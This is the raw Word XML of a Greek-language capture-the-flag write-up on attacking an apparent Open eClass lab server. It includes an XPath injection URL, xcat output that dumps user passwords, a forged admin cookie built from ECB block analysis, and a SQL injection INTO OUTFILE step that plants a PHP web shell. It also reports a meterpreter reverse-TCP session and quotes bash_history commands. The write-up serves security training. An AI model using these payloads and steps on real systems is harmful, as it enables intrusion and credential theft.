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spacing w:before="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.aon0m1ykstd4" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Επεισόδιο #1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Security – Active Response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spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.kg2kntr4xk2i" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Απάντηση στο ερώτημα 1:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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5640"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3360"/>
            <w:gridCol w:w="5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u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME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u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">PASSWORD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evaluation_user1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RFCFqXGGb2N7e4kzfESMwYaq5JbzSTgN9U5t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evaluation_user2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4"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">htY63vfjnu37BZqWZjVARdqggguXg8bHUkeN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SysAdministrator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secret_password (&lt;- not working)</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c7ltessi8j4j" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Μέθοδος που χρησιμοποιήθηκε: XPATH Vulnerability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Από την κεντρική σελίδα </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://users.enemy.chickenkiller.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> χρησιμοποιούμε το URL του κατάλογου χρηστών : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://users.enemy.chickenkiller.com/catalogue.php?name=SysAdministrator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listing </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://users.enemy.chickenkiller.com/catalogue.php?name=SysAdministrator%27%20or%20%27a%27=%27a</w:t>
        </w:r>
      </w:hyperlink>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07766" cy="4024313"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2"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907766" cy="40243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Παρατίθεται και το σχετικό output</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xcat --method=GET http://users.enemy.chickenkiller.com/catalogue.php name=SysAdministrator name "Hello SysAdministrator" run retrieve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Injecting using String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Detecting features...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Supported features: Substring search speedup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Retrieving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&lt;?xml version="1.0" encoding="utf-8"?&gt;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&lt;data&gt;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&lt;users&gt;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&lt;user&gt;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Could not get char at index 11: substring((/*[1]/*[1]/*[1]/*[1]/text()[1]),11,1)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evaluation?user1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Could not get char at index 17: substring((/*[1]/*[1]/*[1]/*[2]/text()[1]),17,1)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Could not get char at index 23: substring((/*[1]/*[1]/*[1]/*[2]/text()[1]),23,1)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Could not get char at index 92: substring((/*[1]/*[1]/*[1]/*[2]/text()[1]),92,1)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&lt;message&gt;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Hello evaluation?user1? The password stored here is valid and you are authorized for Open e?class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&lt;/message&gt;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&lt;password&gt;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RFCFqXGGb2N7e4kzfESMwYaq5JbzSTgN9U5t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&lt;/password&gt;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&lt;/user&gt;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&lt;user&gt;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Could not get char at index 11: substring((/*[1]/*[1]/*[2]/*[1]/text()[1]),11,1)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evaluation?user2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Could not get char at index 17: substring((/*[1]/*[1]/*[2]/*[2]/text()[1]),17,1)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Could not get char at index 23: substring((/*[1]/*[1]/*[2]/*[2]/text()[1]),23,1)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Could not get char at index 92: substring((/*[1]/*[1]/*[2]/*[2]/text()[1]),92,1)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&lt;message&gt;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Hello evaluation?user2? The password stored here is valid and you are authorized for Open e?class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&lt;/message&gt;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&lt;password&gt;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htY63vfjnu37BZqWZjVARdqggguXg8bHUkeN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&lt;/password&gt;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&lt;/user&gt;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&lt;user&gt;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SysAdministrator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&lt;message&gt;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Hello SysAdministrator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&lt;/message&gt;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Could not get char at index 7: substring((/*[1]/*[1]/*[3]/*[3]/text()[1]),7,1)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&lt;password&gt;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secret?password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&lt;/password&gt;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&lt;/user&gt;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&lt;/users&gt;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widowControl w:val="1"/>
        <w:spacing w:after="120" w:before="400" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h.4v8y3o7t98la" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Απάντηση στο </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ερώτημα</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Πήραμε τα cookies -έπειτα από ανάλυση των 2 χρηστών στο login form- και συγκρίναμε τη δομή τους.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Συμπεράναμε πως η δομή της κωδικοποίησης ήταν ECB λόγων των όμοιων block και προσπαθήσαμε να βρούμε την κρυπτογράφηση του SysAdministrator. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ο στόχος φάνηκε πως ήταν να εισάγουμε το Cookie που αντιστοιχούσε στον Administrator στο Cookie που ήδη έιχαμε από κάποιον logged-in user.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Άρα το πρώτο milestone για την επίτευξη του στόχου ήταν να βρούμε το Cookie του Admin, βρίσκοντας σχέσεις στα Patterns των cookies που ήδη είχαμε στα χέρια μας.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Παρατηρήσαμε κοινή ύπαρξη χαρακτήρων στο πρώτο και δεύτερο κομμάτι των cookies όπου και δοκιμάζοντας (με αλλαγές στο hidden πεδίο Date) φάνηκε περίεργη η ύπαρξη του field στο form, όπως φαίνεται και στις ακόλουθες προσπάθειες:</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g1beqbb0bx1k" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookies Analysis Matrix</w:t>
      </w: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COOKIE VALUE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COOKIE CONTENT - NOTES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2rGYOrFposd6lJAE%2Bzfsf %2BkZlFmCJi7d1lOmQ%2BdSBaE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2016/05/26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9Uba0pWWgUdCcatsC5jYmP1OPimRuD%2B%2F6lVsbOLJABU</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 | NO LOGIN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4yw%2B%2FNozMp1VVmT5lZPEGuhjoNbhoK85HWPK4RH%2BBnH</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w:t>
              <w:tab/>
              <w:t xml:space="preserve">NULL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">| NO LOGIN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xX5qSuqWKzaudI0B7MTxR cnFr374MyrXJUYbhWV6JjZ</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15 x Xs   | NO LOGIN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xX5qSuqWKzaudI0B7MTxR fQoZIVDdGQIBd9dtAcPNT%2FJxa9%2B%2BDMq1yVGG4VleiY2Q%3D%3D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15 x Xs SysAdministrator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9dJE98qYgeBQkF%2F%2B70RxhZ tAnONk4WMMTyDtFrd3eHx 9Tj4pkbg%2Fv%2BpVbGziyQAVA%3D%3D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SysAdministrator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%2B7h2ZAqOITs2ZOq9h3TFFywbrh%2BZCnBKmeg6SYpAviu 9Tj4pkbg%2Fv%2BpVbGziyQAVA%3D%3D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User2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9dJE98qYgeBQkF%2F%2B70RxhZ NIWJGSOX%2B5LI6Tx7DXraobQJzjZOFjDE8g7Ra3d3h8fU4%2BKZG4P7%2FqVWxs4skAFQ%3D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SysAdministrator x 2</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2rGYOrFposd6lJAE%2Bzfsf %2BkZlFmCJi7d1lOmQ%2BdSBaE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2016/05/26 | MyIP</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2rGYOrFposd6lJAE%2Bzfsf 9HjojcU3cHCCQ9J02bSJoF</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2016/05/26 | nonMyIP</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%2Bwo%2FFnUqoEOPgXy7fSZnVr7weSF9W%2BStKl5UdZ1E7YF</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Server's IP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2rGYOrFposd6lJAE%2Bzfsf% 2BkZlFmCJi7d1lOmQ%2BdSBaE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2016/05/26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%2BtYCS%2Fb5W8r0026mrLmq9u kZlκFmCJi7d1lOmQ%2BdSBaE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 | MIKE/05/26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SQFuoC2gQwqJMWaEysuOV xX5qSuqWKzaudI0B7MTxR eFnifyg5one6jHqRf2mpMg6itX%2F6VlrL9JpeGgo62KM2G%2FO4Jh11G8w%2Bs5z6Bj3%2FM%3D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User2 | 15 x Xs Server's IP 15 x Xs |</w:t>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Τέλος, αφού αναλύσαμε τα αποτελέσματα έπειτα από decoding και encoding των πρώτων 16byte με BASE64 και χρησιμοποιώντας έναν cookie manager δημιουργήσαμε το τελικό μας cookie που μας έδωσε δικαιώματα διαχειριστή και είναι το ακόλουθο:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0KGSFQ3RkCAXfXbQHDzU%2F2rGYOrFposd6lJAE%2Bzfsf%2BkZlFmCJi7d1lOmQ%2BdSBaE</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731200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="2016-05-26-182656_1366x768_scrot.png" id="6" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="2016-05-26-182656_1366x768_scrot.png" id="0" name="image11.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quersh579umk" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Απάντηση στο Ερώτημα 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Τα δικαιώματα δεν ήταν αρκετά για να ανεβάσουμε backdoor διότι όταν δοκιμάσαμε να αλλάξουμε από έναν Uploader τα file extention όπου μας επίτρεπε ήθελε 2FA όπου δεν γνωρίζαμε το password. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ψάχναμε παράλληλα και τον κώδικα στο GitHub (</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/maellak/openeclass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) με δεδομένο οτι είχαμε να κάνουμε με το OpenClass!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Σε αυτό το σημείο είχαμε αρκετά ενδιαφέροντα ευρήματα τα οποία όμως δεν απέδωδαν, όπως:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Το URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://enemy.chickenkiller.com/modules/admin/commondocs.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> μας επέτρεπε να ανεβάσουμε κείμενο χωρίς την απαίτηση 2FA (Two Factor Authentication)! Δυστυχώς δεν καταφέραμε (στον χρόνο που είχαμε) να κάνουμε bypass το File Extension Check και να ανεβάσουμε εκτελέσιμα αρχεία αν και δοκιμάσαμε αρκετές μεθόδους (εικόνες, pdfs με διπλό, τριπλό extension, Null Poison tests, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Επίσης προσπαθήσαμε (χωρίς αποτέλεσμα) να αλλάξουμε τα επιτρεπόμενα </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Extensions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> όπως δείχνει η επόμενη εικόνα:</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731200" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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Τελικά, αναγκαστήκαμε να ψάξουμε για άλλο Vulnerability γνωρίζοντας οτι υπάρχουν πάρα πολλά Sql Injection το εκμεταλευτήκαμε και χρησιμοποιήσαμε ένα από αυτά για Manual SQL Injection.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Εδώ βλέπουμε ότι μας σταματάει το firewall:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="1"/>
        <w:spacing w:after="0" w:before="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Το οποίο firewall παρακάμψαμε όπως φαίνεται στην παρακάτω εικόνα:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5424488" cy="281744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424488" cy="281744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Επιχειρήσαμε τελικά να χρησιμοποιήσουμε την μέθοδο INTO OUTFILE και INTO DUMPFILE όπου μπορούσαμε να γράψουμε κάποιο PHP κώδικα στον Server . Γράψαμε έναν δικό μας backdoor και ανεβάσαμε SHELL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Παρατίθεται εικόνα από το shell που ανέβηκε με το όνομα:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://enemy.chickenkiller.com/0xyg3n-ellak.php</w:t>
        </w:r>
      </w:hyperlink>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6572418" cy="3052763"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image05.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image05.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6572418" cy="305276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Αμέσως μετά ανεβάσαμε payload με αποτέλεσμα να πάρουμε access με php/meterpreter/reverse_tcp</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3911600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="pasted_image_at_2016_05_27_01_06_pm.png" id="3" name="image08.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="pasted_image_at_2016_05_27_01_06_pm.png" id="0" name="image08.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3911600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Η τελική διαδικασία για την υλοποίηση του ΣΤΟΧΟΥ “απόκτηση ROOT” δεν έχει επιτευχθεί.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Υ.Γ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Όπως παρατηρήσαμε στο bash_history υπήρξε προσπάθεια διαγραφής του flag με την εντολή </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm secret_flag.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> στη γραμμή 23</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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rm -rf bash</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./wrapper -xvf test.tar</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clear</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./wrapper -cvf LKYV.tar secret_flag.txt</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cp LKYV.tar /tmp</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cd /tmp</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/var/www/wrapper -xvf LKYV.tar --no-same-permissions www-data</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/var/www/wrapper -xvf LKYV.tar --no-same-permissions secret_flag.txt</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 secret_flag.txt</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cat Em0aDxYY.sh</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cat EmOaDxYY.sh</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cat NvFaKahc.sh</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cat agOUOoaX</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color w:val="ff0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm secret_flag.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="555459"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> //προσπάθεια διαγραφής secret_flag</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rm LKYV.tar</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w</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cd /var/www</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-la</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cp LKYV.tar /tmp</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cd /tmp</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-la</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/var/www/wrapper -xvf -p www-data LKYV.tar LKYV_secret</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tar -xvf LKYV.tar</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mkdir lkyv</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mv LKYV.tar /lkyv</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-la</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-la LKYV*</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cp LKYV.tar lkyv</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cd lkyv</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ls -la</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tar -xvf LKYV.tar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="265.2631578947369" w:lineRule="auto"/>
        <w:ind w:left="72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cat secret_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
      <w:pPr>
        <w:spacing w:line="265.2631578947369" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
